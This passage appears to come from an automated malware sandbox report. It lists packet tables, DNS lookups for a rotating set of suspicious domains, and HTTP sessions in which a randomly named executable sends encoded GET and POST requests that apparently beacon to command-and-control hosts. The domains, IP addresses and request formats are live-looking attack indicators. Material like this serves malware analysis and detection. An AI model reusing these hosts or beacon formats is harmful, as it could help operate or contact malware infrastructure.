Jan 11, 2025 05:43:49.819849014 CET	80	49992	209.74.79.40	192.168.2.5
Jan 11, 2025 05:43:54.905435085 CET	49993	80	192.168.2.5	136.243.225.5
Jan 11, 2025 05:43:54.910514116 CET	80	49993	136.243.225.5	192.168.2.5
Jan 11, 2025 05:43:54.910732985 CET	49993	80	192.168.2.5	136.243.225.5
Jan 11, 2025 05:43:54.926264048 CET	49993	80	192.168.2.5	136.243.225.5
Jan 11, 2025 05:43:54.931433916 CET	80	49993	136.243.225.5	192.168.2.5
Jan 11, 2025 05:43:55.554913998 CET	80	49993	136.243.225.5	192.168.2.5
Jan 11, 2025 05:43:55.554958105 CET	80	49993	136.243.225.5	192.168.2.5
Jan 11, 2025 05:43:55.555083990 CET	49993	80	192.168.2.5	136.243.225.5
Jan 11, 2025 05:43:56.434413910 CET	49993	80	192.168.2.5	136.243.225.5
Jan 11, 2025 05:43:57.453368902 CET	49994	80	192.168.2.5	136.243.225.5
Jan 11, 2025 05:43:57.458307028 CET	80	49994	136.243.225.5	192.168.2.5
Jan 11, 2025 05:43:57.461736917 CET	49994	80	192.168.2.5	136.243.225.5
Jan 11, 2025 05:43:57.477269888 CET	49994	80	192.168.2.5	136.243.225.5
Jan 11, 2025 05:43:57.482187986 CET	80	49994	136.243.225.5	192.168.2.5
Jan 11, 2025 05:43:58.108350039 CET	80	49994	136.243.225.5	192.168.2.5
Jan 11, 2025 05:43:58.108973980 CET	80	49994	136.243.225.5	192.168.2.5
Jan 11, 2025 05:43:58.109064102 CET	49994	80	192.168.2.5	136.243.225.5
Jan 11, 2025 05:43:58.981359005 CET	49994	80	192.168.2.5	136.243.225.5
Jan 11, 2025 05:44:00.000452995 CET	49995	80	192.168.2.5	136.243.225.5
Jan 11, 2025 05:44:00.006068945 CET	80	49995	136.243.225.5	192.168.2.5
Jan 11, 2025 05:44:00.006205082 CET	49995	80	192.168.2.5	136.243.225.5
Jan 11, 2025 05:44:00.021783113 CET	49995	80	192.168.2.5	136.243.225.5
Jan 11, 2025 05:44:00.026592016 CET	80	49995	136.243.225.5	192.168.2.5
Jan 11, 2025 05:44:00.026674986 CET	80	49995	136.243.225.5	192.168.2.5
Jan 11, 2025 05:44:00.651266098 CET	80	49995	136.243.225.5	192.168.2.5
Jan 11, 2025 05:44:00.651489019 CET	80	49995	136.243.225.5	192.168.2.5
Jan 11, 2025 05:44:00.651628017 CET	49995	80	192.168.2.5	136.243.225.5
Jan 11, 2025 05:44:01.528280020 CET	49995	80	192.168.2.5	136.243.225.5
Jan 11, 2025 05:44:02.548140049 CET	49996	80	192.168.2.5	136.243.225.5
Jan 11, 2025 05:44:02.553069115 CET	80	49996	136.243.225.5	192.168.2.5
Jan 11, 2025 05:44:02.553199053 CET	49996	80	192.168.2.5	136.243.225.5
Jan 11, 2025 05:44:02.563601017 CET	49996	80	192.168.2.5	136.243.225.5
Jan 11, 2025 05:44:02.568444967 CET	80	49996	136.243.225.5	192.168.2.5
Jan 11, 2025 05:44:03.199310064 CET	80	49996	136.243.225.5	192.168.2.5
Jan 11, 2025 05:44:03.201152086 CET	80	49996	136.243.225.5	192.168.2.5
Jan 11, 2025 05:44:03.201201916 CET	49996	80	192.168.2.5	136.243.225.5
Jan 11, 2025 05:44:03.203428030 CET	49996	80	192.168.2.5	136.243.225.5
Jan 11, 2025 05:44:03.209842920 CET	80	49996	136.243.225.5	192.168.2.5
Jan 11, 2025 05:44:08.428750992 CET	49997	80	192.168.2.5	185.68.108.243
Jan 11, 2025 05:44:08.433547020 CET	80	49997	185.68.108.243	192.168.2.5
Jan 11, 2025 05:44:08.433697939 CET	49997	80	192.168.2.5	185.68.108.243
Jan 11, 2025 05:44:08.449371099 CET	49997	80	192.168.2.5	185.68.108.243
Jan 11, 2025 05:44:08.454144955 CET	80	49997	185.68.108.243	192.168.2.5
Jan 11, 2025 05:44:09.091217995 CET	80	49997	185.68.108.243	192.168.2.5
Jan 11, 2025 05:44:09.091236115 CET	80	49997	185.68.108.243	192.168.2.5
Jan 11, 2025 05:44:09.091248035 CET	80	49997	185.68.108.243	192.168.2.5
Jan 11, 2025 05:44:09.091283083 CET	49997	80	192.168.2.5	185.68.108.243
Jan 11, 2025 05:44:09.091327906 CET	49997	80	192.168.2.5	185.68.108.243
Jan 11, 2025 05:44:09.965836048 CET	49997	80	192.168.2.5	185.68.108.243
Jan 11, 2025 05:44:10.984705925 CET	49998	80	192.168.2.5	185.68.108.243
Jan 11, 2025 05:44:10.990581989 CET	80	49998	185.68.108.243	192.168.2.5
Jan 11, 2025 05:44:10.990689039 CET	49998	80	192.168.2.5	185.68.108.243
Jan 11, 2025 05:44:11.006884098 CET	49998	80	192.168.2.5	185.68.108.243
Jan 11, 2025 05:44:11.011651993 CET	80	49998	185.68.108.243	192.168.2.5
Jan 11, 2025 05:44:11.638737917 CET	80	49998	185.68.108.243	192.168.2.5
Jan 11, 2025 05:44:11.638756990 CET	80	49998	185.68.108.243	192.168.2.5
Jan 11, 2025 05:44:11.638763905 CET	80	49998	185.68.108.243	192.168.2.5
Jan 11, 2025 05:44:11.638921022 CET	49998	80	192.168.2.5	185.68.108.243
Jan 11, 2025 05:44:12.512732029 CET	49998	80	192.168.2.5	185.68.108.243
Jan 11, 2025 05:44:13.531580925 CET	49999	80	192.168.2.5	185.68.108.243
Jan 11, 2025 05:44:13.536412954 CET	80	49999	185.68.108.243	192.168.2.5
Jan 11, 2025 05:44:13.536561012 CET	49999	80	192.168.2.5	185.68.108.243
Jan 11, 2025 05:44:13.552262068 CET	49999	80	192.168.2.5	185.68.108.243
Jan 11, 2025 05:44:13.557153940 CET	80	49999	185.68.108.243	192.168.2.5
Jan 11, 2025 05:44:13.557176113 CET	80	49999	185.68.108.243	192.168.2.5
Jan 11, 2025 05:44:14.183406115 CET	80	49999	185.68.108.243	192.168.2.5
Jan 11, 2025 05:44:14.183439970 CET	80	49999	185.68.108.243	192.168.2.5
Jan 11, 2025 05:44:14.183453083 CET	80	49999	185.68.108.243	192.168.2.5
Jan 11, 2025 05:44:14.183487892 CET	49999	80	192.168.2.5	185.68.108.243
Jan 11, 2025 05:44:14.183531046 CET	49999	80	192.168.2.5	185.68.108.243
Jan 11, 2025 05:44:15.059662104 CET	49999	80	192.168.2.5	185.68.108.243
Jan 11, 2025 05:44:16.078461885 CET	50000	80	192.168.2.5	185.68.108.243
Jan 11, 2025 05:44:16.083556890 CET	80	50000	185.68.108.243	192.168.2.5
Jan 11, 2025 05:44:16.083775043 CET	50000	80	192.168.2.5	185.68.108.243
Jan 11, 2025 05:44:16.092875004 CET	50000	80	192.168.2.5	185.68.108.243
Jan 11, 2025 05:44:16.097758055 CET	80	50000	185.68.108.243	192.168.2.5
Jan 11, 2025 05:44:16.782670021 CET	80	50000	185.68.108.243	192.168.2.5
Jan 11, 2025 05:44:16.782686949 CET	80	50000	185.68.108.243	192.168.2.5
Jan 11, 2025 05:44:16.782701969 CET	80	50000	185.68.108.243	192.168.2.5
Jan 11, 2025 05:44:16.782855988 CET	50000	80	192.168.2.5	185.68.108.243
Jan 11, 2025 05:44:16.782910109 CET	50000	80	192.168.2.5	185.68.108.243
Jan 11, 2025 05:44:16.790652990 CET	50000	80	192.168.2.5	185.68.108.243
Jan 11, 2025 05:44:16.795510054 CET	80	50000	185.68.108.243	192.168.2.5
Jan 11, 2025 05:44:22.171309948 CET	50001	80	192.168.2.5	134.122.135.48
Jan 11, 2025 05:44:22.176170111 CET	80	50001	134.122.135.48	192.168.2.5
Jan 11, 2025 05:44:22.176268101 CET	50001	80	192.168.2.5	134.122.135.48
Jan 11, 2025 05:44:22.191741943 CET	50001	80	192.168.2.5	134.122.135.48
Jan 11, 2025 05:44:22.196566105 CET	80	50001	134.122.135.48	192.168.2.5
Jan 11, 2025 05:44:23.057192087 CET	80	50001	134.122.135.48	192.168.2.5
Jan 11, 2025 05:44:23.057248116 CET	80	50001	134.122.135.48	192.168.2.5
Jan 11, 2025 05:44:23.057329893 CET	50001	80	192.168.2.5	134.122.135.48
Jan 11, 2025 05:44:23.700409889 CET	50001	80	192.168.2.5	134.122.135.48
Jan 11, 2025 05:44:24.719374895 CET	50002	80	192.168.2.5	134.122.135.48
Jan 11, 2025 05:44:24.724268913 CET	80	50002	134.122.135.48	192.168.2.5
Jan 11, 2025 05:44:24.724432945 CET	50002	80	192.168.2.5	134.122.135.48
Jan 11, 2025 05:44:24.739429951 CET	50002	80	192.168.2.5	134.122.135.48
Jan 11, 2025 05:44:24.744317055 CET	80	50002	134.122.135.48	192.168.2.5
Jan 11, 2025 05:44:25.639854908 CET	80	50002	134.122.135.48	192.168.2.5
Jan 11, 2025 05:44:25.639904022 CET	80	50002	134.122.135.48	192.168.2.5
Jan 11, 2025 05:44:25.640045881 CET	50002	80	192.168.2.5	134.122.135.48
Jan 11, 2025 05:44:26.247474909 CET	50002	80	192.168.2.5	134.122.135.48
Jan 11, 2025 05:44:27.266172886 CET	50003	80	192.168.2.5	134.122.135.48
Jan 11, 2025 05:44:27.271145105 CET	80	50003	134.122.135.48	192.168.2.5
Jan 11, 2025 05:44:27.271291018 CET	50003	80	192.168.2.5	134.122.135.48
Jan 11, 2025 05:44:27.287427902 CET	50003	80	192.168.2.5	134.122.135.48
Jan 11, 2025 05:44:27.292368889 CET	80	50003	134.122.135.48	192.168.2.5
Jan 11, 2025 05:44:27.292566061 CET	80	50003	134.122.135.48	192.168.2.5
Jan 11, 2025 05:44:28.175090075 CET	80	50003	134.122.135.48	192.168.2.5
Jan 11, 2025 05:44:28.175110102 CET	80	50003	134.122.135.48	192.168.2.5
Jan 11, 2025 05:44:28.175215960 CET	50003	80	192.168.2.5	134.122.135.48
Jan 11, 2025 05:44:28.794437885 CET	50003	80	192.168.2.5	134.122.135.48
Jan 11, 2025 05:44:29.822468996 CET	50004	80	192.168.2.5	134.122.135.48
Jan 11, 2025 05:44:29.827728033 CET	80	50004	134.122.135.48	192.168.2.5
Jan 11, 2025 05:44:29.827806950 CET	50004	80	192.168.2.5	134.122.135.48
Jan 11, 2025 05:44:29.842989922 CET	50004	80	192.168.2.5	134.122.135.48
Jan 11, 2025 05:44:29.847881079 CET	80	50004	134.122.135.48	192.168.2.5
Jan 11, 2025 05:44:30.715886116 CET	80	50004	134.122.135.48	192.168.2.5
Jan 11, 2025 05:44:30.715925932 CET	80	50004	134.122.135.48	192.168.2.5
Jan 11, 2025 05:44:30.716236115 CET	50004	80	192.168.2.5	134.122.135.48
Jan 11, 2025 05:44:30.719073057 CET	50004	80	192.168.2.5	134.122.135.48
Jan 11, 2025 05:44:30.724920988 CET	80	50004	134.122.135.48	192.168.2.5
Jan 11, 2025 05:44:35.759533882 CET	50005	80	192.168.2.5	217.160.0.167
Jan 11, 2025 05:44:35.764403105 CET	80	50005	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:35.764487028 CET	50005	80	192.168.2.5	217.160.0.167
Jan 11, 2025 05:44:35.778884888 CET	50005	80	192.168.2.5	217.160.0.167
Jan 11, 2025 05:44:35.783710957 CET	80	50005	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:36.427649975 CET	80	50005	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:36.427675009 CET	80	50005	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:36.427690029 CET	80	50005	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:36.427849054 CET	50005	80	192.168.2.5	217.160.0.167
Jan 11, 2025 05:44:37.294404984 CET	50005	80	192.168.2.5	217.160.0.167
Jan 11, 2025 05:44:38.313211918 CET	50006	80	192.168.2.5	217.160.0.167
Jan 11, 2025 05:44:38.318172932 CET	80	50006	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:38.318312883 CET	50006	80	192.168.2.5	217.160.0.167
Jan 11, 2025 05:44:38.332938910 CET	50006	80	192.168.2.5	217.160.0.167
Jan 11, 2025 05:44:38.337858915 CET	80	50006	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:38.985424042 CET	80	50006	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:38.985467911 CET	80	50006	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:38.985502958 CET	80	50006	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:38.985595942 CET	50006	80	192.168.2.5	217.160.0.167
Jan 11, 2025 05:44:38.985632896 CET	50006	80	192.168.2.5	217.160.0.167
Jan 11, 2025 05:44:39.844616890 CET	50006	80	192.168.2.5	217.160.0.167
Jan 11, 2025 05:44:40.860296011 CET	50007	80	192.168.2.5	217.160.0.167
Jan 11, 2025 05:44:40.865443945 CET	80	50007	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:40.868500948 CET	50007	80	192.168.2.5	217.160.0.167
Jan 11, 2025 05:44:40.884263992 CET	50007	80	192.168.2.5	217.160.0.167
Jan 11, 2025 05:44:40.889091015 CET	80	50007	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:40.889147043 CET	80	50007	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:41.529701948 CET	80	50007	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:41.529727936 CET	80	50007	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:41.529747009 CET	80	50007	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:41.529827118 CET	50007	80	192.168.2.5	217.160.0.167
Jan 11, 2025 05:44:41.529871941 CET	50007	80	192.168.2.5	217.160.0.167
Jan 11, 2025 05:44:42.426848888 CET	50007	80	192.168.2.5	217.160.0.167
Jan 11, 2025 05:44:43.438186884 CET	50008	80	192.168.2.5	217.160.0.167
Jan 11, 2025 05:44:43.443104029 CET	80	50008	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:43.444470882 CET	50008	80	192.168.2.5	217.160.0.167
Jan 11, 2025 05:44:43.454061985 CET	50008	80	192.168.2.5	217.160.0.167
Jan 11, 2025 05:44:43.458939075 CET	80	50008	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:44.079739094 CET	80	50008	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:44.079771996 CET	80	50008	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:44.079786062 CET	80	50008	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:44.079828024 CET	80	50008	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:44.079840899 CET	80	50008	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:44.079857111 CET	80	50008	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:44.079945087 CET	50008	80	192.168.2.5	217.160.0.167
Jan 11, 2025 05:44:44.079982996 CET	50008	80	192.168.2.5	217.160.0.167
Jan 11, 2025 05:44:44.080499887 CET	80	50008	217.160.0.167	192.168.2.5
Jan 11, 2025 05:44:44.083602905 CET	50008	80	192.168.2.5	217.160.0.167
Jan 11, 2025 05:44:44.084465027 CET	50008	80	192.168.2.5	217.160.0.167
Jan 11, 2025 05:44:44.089329004 CET	80	50008	217.160.0.167	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 05:42:50.897922993 CET	58050	53	192.168.2.5	1.1.1.1
Jan 11, 2025 05:42:51.015716076 CET	53	58050	1.1.1.1	192.168.2.5
Jan 11, 2025 05:43:06.702689886 CET	63718	53	192.168.2.5	1.1.1.1
Jan 11, 2025 05:43:06.913105965 CET	53	63718	1.1.1.1	192.168.2.5
Jan 11, 2025 05:43:20.280927896 CET	64688	53	192.168.2.5	1.1.1.1
Jan 11, 2025 05:43:20.343688011 CET	53	64688	1.1.1.1	192.168.2.5
Jan 11, 2025 05:43:33.468883991 CET	50077	53	192.168.2.5	1.1.1.1
Jan 11, 2025 05:43:33.477818966 CET	53	50077	1.1.1.1	192.168.2.5
Jan 11, 2025 05:43:41.531507015 CET	64872	53	192.168.2.5	1.1.1.1
Jan 11, 2025 05:43:41.551172018 CET	53	64872	1.1.1.1	192.168.2.5
Jan 11, 2025 05:43:54.828783989 CET	60754	53	192.168.2.5	1.1.1.1
Jan 11, 2025 05:43:54.902836084 CET	53	60754	1.1.1.1	192.168.2.5
Jan 11, 2025 05:44:08.219398022 CET	53974	53	192.168.2.5	1.1.1.1
Jan 11, 2025 05:44:08.425978899 CET	53	53974	1.1.1.1	192.168.2.5
Jan 11, 2025 05:44:21.797668934 CET	52655	53	192.168.2.5	1.1.1.1
Jan 11, 2025 05:44:22.167984009 CET	53	52655	1.1.1.1	192.168.2.5
Jan 11, 2025 05:44:35.735254049 CET	51548	53	192.168.2.5	1.1.1.1
Jan 11, 2025 05:44:35.756922960 CET	53	51548	1.1.1.1	192.168.2.5
Jan 11, 2025 05:44:49.095210075 CET	59468	53	192.168.2.5	1.1.1.1
Jan 11, 2025 05:44:49.103368044 CET	53	59468	1.1.1.1	192.168.2.5
Jan 11, 2025 05:44:57.548497915 CET	58080	53	192.168.2.5	1.1.1.1
Jan 11, 2025 05:44:57.559401989 CET	53	58080	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 05:42:50.897922993 CET	192.168.2.5	1.1.1.1	0xa4a9	Standard query (0)	www.did-ready.info	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:43:06.702689886 CET	192.168.2.5	1.1.1.1	0xd050	Standard query (0)	www.newbh.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:43:20.280927896 CET	192.168.2.5	1.1.1.1	0xe445	Standard query (0)	www.deadshoy.tech	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:43:33.468883991 CET	192.168.2.5	1.1.1.1	0x93da	Standard query (0)	www.spindisclite.store	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:43:41.531507015 CET	192.168.2.5	1.1.1.1	0xf8ed	Standard query (0)	www.futurexz.xyz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:43:54.828783989 CET	192.168.2.5	1.1.1.1	0xd71a	Standard query (0)	www.myfastuploader.sbs	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:44:08.219398022 CET	192.168.2.5	1.1.1.1	0xcb82	Standard query (0)	www.accusolution.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:44:21.797668934 CET	192.168.2.5	1.1.1.1	0x46a9	Standard query (0)	www.jrcov55qgcxp5fwa.top	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:44:35.735254049 CET	192.168.2.5	1.1.1.1	0xd8bb	Standard query (0)	www.nocoma.berlin	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:44:49.095210075 CET	192.168.2.5	1.1.1.1	0x6381	Standard query (0)	www.1337street.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:44:57.548497915 CET	192.168.2.5	1.1.1.1	0x441e	Standard query (0)	www.buyspeechst.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 05:42:51.015716076 CET	1.1.1.1	192.168.2.5	0xa4a9	No error (0)	www.did-ready.info		194.245.148.189	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:43:06.913105965 CET	1.1.1.1	192.168.2.5	0xd050	No error (0)	www.newbh.pro		176.57.65.76	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:43:20.343688011 CET	1.1.1.1	192.168.2.5	0xe445	No error (0)	www.deadshoy.tech		199.59.243.228	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:43:33.477818966 CET	1.1.1.1	192.168.2.5	0x93da	Name error (3)	www.spindisclite.store	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:43:41.551172018 CET	1.1.1.1	192.168.2.5	0xf8ed	No error (0)	www.futurexz.xyz		209.74.79.40	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:43:54.902836084 CET	1.1.1.1	192.168.2.5	0xd71a	No error (0)	www.myfastuploader.sbs	myfastuploader.sbs		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 05:43:54.902836084 CET	1.1.1.1	192.168.2.5	0xd71a	No error (0)	myfastuploader.sbs		136.243.225.5	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:44:08.425978899 CET	1.1.1.1	192.168.2.5	0xcb82	No error (0)	www.accusolution.pro	accusolution.pro		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 05:44:08.425978899 CET	1.1.1.1	192.168.2.5	0xcb82	No error (0)	accusolution.pro		185.68.108.243	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:44:22.167984009 CET	1.1.1.1	192.168.2.5	0x46a9	No error (0)	www.jrcov55qgcxp5fwa.top	zcdn.8383dns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 05:44:22.167984009 CET	1.1.1.1	192.168.2.5	0x46a9	No error (0)	zcdn.8383dns.com		134.122.135.48	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:44:22.167984009 CET	1.1.1.1	192.168.2.5	0x46a9	No error (0)	zcdn.8383dns.com		134.122.133.80	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:44:35.756922960 CET	1.1.1.1	192.168.2.5	0xd8bb	No error (0)	www.nocoma.berlin	nocoma.berlin		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 05:44:35.756922960 CET	1.1.1.1	192.168.2.5	0xd8bb	No error (0)	nocoma.berlin		217.160.0.167	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:44:49.103368044 CET	1.1.1.1	192.168.2.5	0x6381	Name error (3)	www.1337street.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:44:57.559401989 CET	1.1.1.1	192.168.2.5	0x441e	No error (0)	www.buyspeechst.shop		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:44:57.559401989 CET	1.1.1.1	192.168.2.5	0x441e	No error (0)	www.buyspeechst.shop		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:44:57.559401989 CET	1.1.1.1	192.168.2.5	0x441e	No error (0)	www.buyspeechst.shop		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:44:57.559401989 CET	1.1.1.1	192.168.2.5	0x441e	No error (0)	www.buyspeechst.shop		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:44:57.559401989 CET	1.1.1.1	192.168.2.5	0x441e	No error (0)	www.buyspeechst.shop		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:44:57.559401989 CET	1.1.1.1	192.168.2.5	0x441e	No error (0)	www.buyspeechst.shop		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:44:57.559401989 CET	1.1.1.1	192.168.2.5	0x441e	No error (0)	www.buyspeechst.shop		104.21.96.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.did-ready.info

www.newbh.pro

www.deadshoy.tech

www.futurexz.xyz

www.myfastuploader.sbs

www.accusolution.pro

www.jrcov55qgcxp5fwa.top

www.nocoma.berlin

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49979	194.245.148.189	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:42:51.046835899 CET	537	OUT	GET /a8nx/?Gr=hRRPf2Bx&Kd=+ijtfUcEkczZonQRTZPeCxhL9X8p6elqT8rXZI1bhPKlL7JJ7DdsZ8/v+QWmOaPAOWgXu8Ydnt1hKQQAhZJ0WwNa4BdoDk4Jtf0qdRrQh94duU9UXEEBP8Ipt55IFbhY/Q== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close Host: www.did-ready.info User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Jan 11, 2025 05:42:51.660022020 CET	242	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 04:42:51 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1840 Last-Modified: Tue, 04 Apr 2017 13:56:46 GMT Connection: close ETag: "58e3a61e-730" Accept-Ranges: bytes
Jan 11, 2025 05:42:51.660098076 CET	1236	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> ... The above 3 meta
Jan 11, 2025 05:42:51.660131931 CET	604	IN	Data Raw: 7a 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 3c 70 3e 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 6c 67 20 62 74 6e 2d 73 75 63 63 65 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 6f 6b 65 72 2e 63 6f 6d 2f 3f Data Ascii: zation.</p> <p><a class="btn btn-lg btn-success" href="https://joker.com/?pk_campaign=Parking&pk_kwd=text" role="button">JOKER.COM</a></p> </div> <footer class="footer"> <p>© 2017 CSL GmbH / JOKER.COM</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49980	176.57.65.76	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:43:06.934928894 CET	782	OUT	POST /67jc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Host: www.newbh.pro Origin: http://www.newbh.pro Referer: http://www.newbh.pro/67jc/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 4b 64 3d 70 42 4d 30 45 6c 4e 75 7a 70 35 44 6f 61 62 77 4d 65 35 59 6e 47 32 6d 76 70 50 63 56 58 4d 79 37 63 74 67 62 6b 63 75 6b 4e 4f 79 6e 62 6c 6b 4b 54 66 72 48 56 41 58 6b 59 79 62 4c 48 56 48 53 52 53 67 6c 4b 65 43 6a 43 30 47 4b 74 33 78 55 52 66 76 62 32 31 4a 41 6c 37 77 52 72 30 71 6f 37 67 53 77 4d 71 5a 47 68 74 71 78 68 67 2f 70 32 4b 4c 58 54 33 68 59 49 74 47 71 74 72 7a 61 71 79 70 48 6f 54 75 6b 30 79 65 73 61 43 68 56 45 63 4f 32 67 6f 6c 58 31 47 53 65 75 65 70 4d 67 2f 6d 31 4f 6d 6c 65 39 72 4f 46 77 74 53 59 59 54 51 78 5a 62 5a 53 61 69 4b 31 32 4b 46 6f 4e 42 52 49 54 67 3d Data Ascii: Kd=pBM0ElNuzp5DoabwMe5YnG2mvpPcVXMy7ctgbkcukNOynblkKTfrHVAXkYybLHVHSRSglKeCjC0GKt3xURfvb21JAl7wRr0qo7gSwMqZGhtqxhg/p2KLXT3hYItGqtrzaqypHoTuk0yesaChVEcO2golX1GSeuepMg/m1Omle9rOFwtSYYTQxZbZSaiK12KFoNBRITg=
Jan 11, 2025 05:43:07.599719048 CET	1234	IN	HTTP/1.1 301 Moved Permanently Server: ddos-guard Connection: close Set-Cookie: __ddg8_=3bgPaG6sd3uHMIMi; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 05:03:07 GMT Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 05:03:07 GMT Set-Cookie: __ddg10_=1736570587; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 05:03:07 GMT Set-Cookie: __ddg1_=2PA45AppvF69gdMzll29; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sun, 11-Jan-2026 04:43:07 GMT date: Sat, 11 Jan 2025 04:43:07 GMT content-type: text/html; charset=iso-8859-1 content-length: 397 location: https://www.newbh.pro/67jc/?g2V6RQ=kDkUHRN5t7dj/L6pbYtXinLd6bfODVMZ28RJcX0ruebcxps2UknIHDIRpo6SPn5cYwuXhe648Q1lIcrqVg3rX3gTF0edSK070ZtP7rfoPWFFmRUsoXyrHju8fZY++tHlaKveA/Dc6mrH&Dlp=xkAs2 x-host: www.newbh.pro x-tilda-server: 31 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 